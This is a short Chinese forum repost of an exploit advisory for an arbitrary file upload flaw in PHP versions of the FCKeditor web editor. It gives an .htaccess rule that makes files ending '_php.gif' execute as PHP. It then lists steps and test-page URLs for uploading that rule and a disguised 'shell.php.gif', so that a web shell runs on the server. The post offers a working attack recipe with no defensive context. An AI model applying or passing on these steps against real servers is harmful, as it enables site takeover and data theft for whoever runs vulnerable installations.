admin 发表于 2013-10-27 17:25:21

FCKeditor所有php版本Upload上传漏洞


FCKeditor所有php版本Upload上传漏洞
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
减小字体 增大字体
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1.create a htaccess file:
code:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
5.http://www.sinesafe.cn/anything/shell_php.gif
6.Now shell is available from server.



页: [1]
查看完整版本: FCKeditor所有php版本Upload上传漏洞